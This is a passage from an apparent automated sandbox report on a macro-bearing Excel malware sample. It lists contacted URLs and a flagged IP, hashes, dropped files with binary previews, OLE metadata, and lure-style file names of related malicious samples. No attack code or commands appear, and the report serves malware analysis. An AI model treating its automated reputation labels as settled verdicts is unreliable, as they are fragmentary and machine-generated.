                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.ai72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.com72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devices72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://directory.services.72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://login.windows-ppe.net/common/oauth2/authorize72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    208.91.199.118
                                                                                                                                                    unknownUnited States
                                                                                                                                                    394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                                                                                                                                    Private

                                                                                                                                                    IP
                                                                                                                                                    192.168.2.1

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                    Analysis ID:356276
                                                                                                                                                    Start date:22.02.2021
                                                                                                                                                    Start time:20:41:11
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 4s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:document-550193913.xls
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:24
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal76.expl.evad.winXLS@3/6@1/2
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xls
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 51.104.144.132, 51.103.5.186, 40.88.32.150, 168.61.161.212, 184.30.25.218, 184.30.21.144, 52.109.88.177, 52.109.76.35, 104.42.151.234, 52.109.8.23, 13.64.90.137, 51.104.146.109, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 184.30.24.56
                                                                                                                                                    • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    208.91.199.118document-550193913.xlsGet hashmaliciousBrowse

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      PUBLIC-DOMAIN-REGISTRYUSdocument-550193913.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      SecuriteInfo.com.Trojan.Packed2.42850.3598.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.225
                                                                                                                                                      SecuriteInfo.com.Trojan.Inject4.6572.1879.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.224
                                                                                                                                                      ffkjg5CVrO.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.223
                                                                                                                                                      7Lf8J7h7os.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.223
                                                                                                                                                      Shipping Details_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.198.143
                                                                                                                                                      YKRAB010B_KHE_Preminary Packing List.xlsx.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.225
                                                                                                                                                      RTM DIAS - CTM.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.198.143
                                                                                                                                                      AWB & Shipping Doc.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.223
                                                                                                                                                      AWB & Shipping Doc.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.223
                                                                                                                                                      PAYMENT INVOICE-9876543456789.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.224
                                                                                                                                                      SecuriteInfo.com.Artemis249E62CF9BAE.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.198.143
                                                                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10204.3307.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.50.162.157
                                                                                                                                                      document-573042818.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.50.162.157
                                                                                                                                                      document-573042818.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.50.162.157
                                                                                                                                                      document-573042818.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.50.162.157
                                                                                                                                                      document-750895311.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.50.162.157
                                                                                                                                                      19_02_2021.exeGet hashmaliciousBrowse
                                                                                                                                                      • 111.118.215.254
                                                                                                                                                      inquiry.docGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.224
                                                                                                                                                      SecuriteInfo.com.Artemis1A08A3826D57.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.225

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19GUEROLA INDUSTRIES N#U00ba de cuenta.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      receipt145.htmGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      xerox for hycite.htmGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      SecuriteInfo.com.Heur.15528.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      Muligheds.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      DHL_6368638172 documento de recibo,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      pagamento.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      message_zdm (2).htmlGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      Statement-ID28865611496334.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      Statement-ID21488878391791.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      frank_2021-02-22_02-03.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      Statement-ID72347595684775.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      MR52.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      Scan_medcal equipment sample_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      rfq02212021.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      RE ICA 40 Sdn Bhd- Purchase Order#6769704.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      RFQ-#09503.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      RFQ_1101983736366355 1101938377388.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118
                                                                                                                                                      Offer Request 6100003768.exeGet hashmaliciousBrowse
                                                                                                                                                      • 208.91.199.118

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\72A41860-C1A7-4BDE-8AFA-23221FF1D9E1
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):132891
                                                                                                                                                      Entropy (8bit):5.375873358827022
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:ocQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:6cQ9DQW+z0XiK
                                                                                                                                                      MD5:13BF145AB781CEF70C3CD6B6C3FC67EA
                                                                                                                                                      SHA1:CFACE7687B0AF5D209D6CD8605B9581F2D8AB36E
                                                                                                                                                      SHA-256:A4BFAF97A730C5CA7A289B8FDCC95B82CDDE6B14185C7D02C00445E3EC3FC63B
                                                                                                                                                      SHA-512:86B44EFE4D64B4B769AC0984011380AA91BD3F344A2BDB6EDE6A7BC9E8EFB78D77A9CB2F25CDBC989A224D9E3BA72D0475FD71BF50362A975A7CD7F6A39D2DEF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-22T19:42:08">.. Build: 16.0.13817.30529-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\6A720000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):64313
                                                                                                                                                      Entropy (8bit):7.695321697495755
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:OjdFAq+nbub6aJpa/h/9g/W/iuz9c9ZJRf9wx8fkoM/WJFst:kdUbueaJpaZlgulEZJRlwPWS
                                                                                                                                                      MD5:08B9828287649D83138E0CED3E6D8883
                                                                                                                                                      SHA1:8EB27148881D50A2C6524E218AFAB8F5CCB07182
                                                                                                                                                      SHA-256:917FC9BB7AEDEB021ABA529D20202D9AB093256984260AF2EE5CA1BA264AB49A
                                                                                                                                                      SHA-512:C4F634F6E210B514E26124E8898BF346D450F6BD6A1D99A1CD3708C1A0B7FFE7472CD7EBAE57A85B3DDA7A05AF10FA2082F66482592AAE111DD065E19920800F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .U.N.0....;D.....j......x..=M.:.e.h.~.n..*.U+qi.8....r....}P.......R..f...._.....m..l..].N~L...CAh.j...~s.D....:4.....H?}...%4..'.....hb....M....t,.Wt{....W..T.T...>..+....i% R4.l..[.],.@i.SGf..<..-b.t."...c.*.'..u.O.."d6.Z..)...BZy...T=.6.+....x....W..X..[..v..j.P.J..r......FZ.e^..P........._....d....wo..O...?........b......&........o@........nH.[.(.#......r....^....9...hDW..W-M.#.?....}..t.x.....N......p...f.H.....9.r.6............PK..........!...l.............[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 18:52:18 2019, mtime=Tue Feb 23 03:42:11 2021, atime=Tue Feb 23 03:42:11 2021, length=8192, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):917
                                                                                                                                                      Entropy (8bit):4.654518870938884
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8Arv/c20UzjWCHo6PgjyXx+WMjA+N/E2ybD8PS9LIeYIe8k44t2Y+xIBjKZm:8QvXrgqQAS8HD2qV7aB6m
                                                                                                                                                      MD5:FFC77D8F9AC64AFC42D2D5F326FC5D71
                                                                                                                                                      SHA1:210C3DD38A423AFE38692DEAD1B0EB592E28C57F
                                                                                                                                                      SHA-256:5D8F91B6BD0AFAFE98F76FE2F715E64EE784C3877B5B76D5FE1A804E2CDAE438
                                                                                                                                                      SHA-512:40070DA9B7A686D2CEF7738552C484091370ECAEBE5272B69344DE8004949C657C3A0FE682EAEC3C6E2045D6B4B2B57A0DF39B42B73194632D41E7FDFFA5CCC5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F..........h.!-..q.S@....#aQ@..... ...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WR9%....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qb{..user..B.......N..WR9%.....S......................T.e.n.g.i.n.e.e.r.....~.1.....WRF%..Desktop.h.......N..WRF%.....Y..............>......V..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......H...............-.......G...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...A}...`.......X.......767668...........!a..%.H.VZAj...,,/..........-$..!a..%.H.VZAj...,,/..........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-550193913.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:27:01 2020, mtime=Tue Feb 23 03:42:11 2021, atime=Tue Feb 23 03:42:11 2021, length=93696, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2216
                                                                                                                                                      Entropy (8bit):4.691234999429596
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8D/FrgZHL+1yAP8MbD2qh777aB6myD/FrgZHL+1yAP8MbD2qh777aB6m:8D/KBqbPdB7iB6pD/KBqbPdB7iB6
                                                                                                                                                      MD5:727124B6729A7E2E8CFE26CBB4F32343
                                                                                                                                                      SHA1:1B9CF5F6EF44E3AAB4A23B2A37A4EB5A7439D459
                                                                                                                                                      SHA-256:AEDF7631550E55E85F9224A5C0E3E6DB1384D3C7EDD15382D46992230506496D
                                                                                                                                                      SHA-512:D294B5D403351AB6C1981F44E976B03BCEAA574D1AB9F05919F8DF3128182B66F385B728ADCDDDB626738DDAE958B13BD80F5FBCBDF98D0BA68DCA6C41E4E0F9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ....g.$>.....Z@......Z@.....n...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WR9%....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qb{..user..B.......N..WR9%.....S......................T.e.n.g.i.n.e.e.r.....~.1.....>Qc{..Desktop.h.......N..WR9%.....Y..............>......`^.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2..n..WRA% .DOCUME~1.XLS..^......>Qa{WRA%.....R.....................)o.d.o.c.u.m.e.n.t.-.5.5.0.1.9.3.9.1.3...x.l.s......._...............-.......^...........>.S......C:\Users\user\Desktop\document-550193913.xls..-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.5.5.0.1.9.3.9.1.3...x.l.s.........:..,.LB.)...A}...`.......X.......767668...........!a..%.H.VZAj.......1........-$..!a..%.H.VZAj.......1........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):118
                                                                                                                                                      Entropy (8bit):4.778813097271172
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:bDesBVomMY9LRzcWl2ulZELRzcWl2ulmMY9LRzcWl2ulv:bSsj6Y9LVl1ELVlPY9LVlL
                                                                                                                                                      MD5:D4A7A871A49C8C8C3AC9D7F9F346BB95
                                                                                                                                                      SHA1:74E2882E0D0540D90BF6FE47A6AB580647B06F79
                                                                                                                                                      SHA-256:DFF7A8A574A72E8D6B1D3E594F2F9086B0BAE17CAF20EBC9228CD07053B82241
                                                                                                                                                      SHA-512:FDD20AB84F66B82B1C6C2B2F8831B55E254B89C749EAD96961849CCFE3A0F94350791ACFDA4416B60BA2715C14D06098D888BAEB69B23955BCEAA44FDA6153CE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: [folders]..Desktop.LNK=0..[xls]..document-550193913.LNK=0..document-550193913.LNK=0..[xls]..document-550193913.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\8B720000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):127228
                                                                                                                                                      Entropy (8bit):4.313669000068747
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:iJxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAFVFXUkkJxEtjPOtioVjDGUU1qfDlaGf:kxEtjPOtioVjDGUU1qfDlavx+W2QnAFS
                                                                                                                                                      MD5:0679E94B435C5BF470319F61C625C6F3
                                                                                                                                                      SHA1:903DF6E9E7964CC9F5B410D0A29296A3D927E49D
                                                                                                                                                      SHA-256:F5E5F268418E43518EA986317606222258E27BF605D218184DA513D2BD388479
                                                                                                                                                      SHA-512:2B4143D42826004B8C93FE3CE7DF6CAA14F31C34C2C9460FFD578969B2226136605ADE4CC14CFE3C8F8948B12E6A76DB477D258477875AA1F5CCFA63405547E7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T8..........................\.p.... B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.......>..........C.a.l.i.b.r.i.1.......?..........C.a.l.i.b.r.i.1.......4..........C.a.l.i.b.r.i.1...,...8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...h...8..........C.a.m.b.r.i.a.1.......<..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.......4..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...........

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 22 11:59:11 2021, Security: 0
                                                                                                                                                      Entropy (8bit):3.4738983608957428
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                      File name:document-550193913.xls
                                                                                                                                                      File size:93696
                                                                                                                                                      MD5:4107cd071635b4cc3689f77c688f57c3
                                                                                                                                                      SHA1:cf6dea64431b614757906f32d3d1f016b5afdbb5
                                                                                                                                                      SHA256:d49b40d468269f57fb87ea6ad7fd8bb303fbeb033dbd45fb4967c34c5dfbc2ed
                                                                                                                                                      SHA512:ae568d93ef0c9cea430e18bdf5a27cb5e71fe2e13cfca9c508f196aead42d7a1e68dd863587a0549391b7c08af85de9e6db574c9d819422482ed6529df52c0fb
                                                                                                                                                      SSDEEP:1536:ca7uDphYHceXVhca+fMHLtyeGxcl8O9pTINXUOmRwb05SXw1OTsRKvoNGrEJq7TT:ca7uDphYHceXVhca+fMHLtyeGxcl8O9m
                                                                                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OLE
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "document-550193913.xls"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:True
                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                      Summary

                                                                                                                                                      Code Page:1251
                                                                                                                                                      Author:
                                                                                                                                                      Last Saved By:
                                                                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                                                                      Last Saved Time:2021-02-22 11:59:11
                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Document Code Page:1251
                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                      Contains Dirty Links:False
                                                                                                                                                      Shared Document:False
                                                                                                                                                      Changed Hyperlinks:False
                                                                                                                                                      Application Version:917504

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.337819969156
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a8 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.250492291218
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
